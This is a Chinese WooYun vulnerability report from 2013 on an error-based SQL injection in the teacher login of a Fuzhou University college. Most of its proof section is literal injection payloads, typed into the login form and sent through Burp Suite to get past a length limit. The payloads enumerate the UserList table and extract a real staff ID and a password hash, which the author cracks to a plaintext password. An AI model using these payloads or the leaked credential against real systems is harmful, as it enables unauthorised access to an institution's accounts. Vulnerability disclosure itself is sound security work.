当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037938

漏洞标题:福州大学某学院存在漏洞爆得教师登陆账号密码

相关厂商:福州大学

漏洞作者: 星明月稀

提交时间:2013-09-24 10:05

修复时间:2013-11-08 10:06

公开时间:2013-11-08 10:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

福州大学某学院存在漏洞爆得教师登陆账号密码

详细说明:

mssql显错模式注入爆得后台教师登陆的工号,密码!

漏洞证明:

首页底下有个教师登陆:

QQ截图20130924093153.jpg


登陆界面如图:

.jpg


1. 输入账号: ‘a ,密码随意,登陆。
显错(如图),说明可能存在注入点

1.jpg


2,开始爆字段:
(1)输入:’ having 11=1 --
得:UserList表的UserID字段,继续。。。

2.jpg


(2)输入:’ group by UserList.UserID having 11=1 --

3.jpg


额,出现输入框有字数限制,拿出神器Burp Suite,截包改包。。。

4.jpg


得:字段UserName
(3)同理,输入:’ group by UserList.UserID,UserList.Name having 11=1--

5.jpg


得:字段Password
3,爆内容
(1)输入:’ and (select top 1 UserList.Name from UserList)>0--

6.jpg


得:第一个工号cwb1
(2)输入:’ and(select top 1 UserList.Password from UserList)>0--

7.jpg


得:密码1BBD886460827015E5D605ED44252251
拿到CMD5解密:11111111

修复方案:

重定向到同一错误页面等。。。

版权声明:转载请注明来源 星明月稀@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝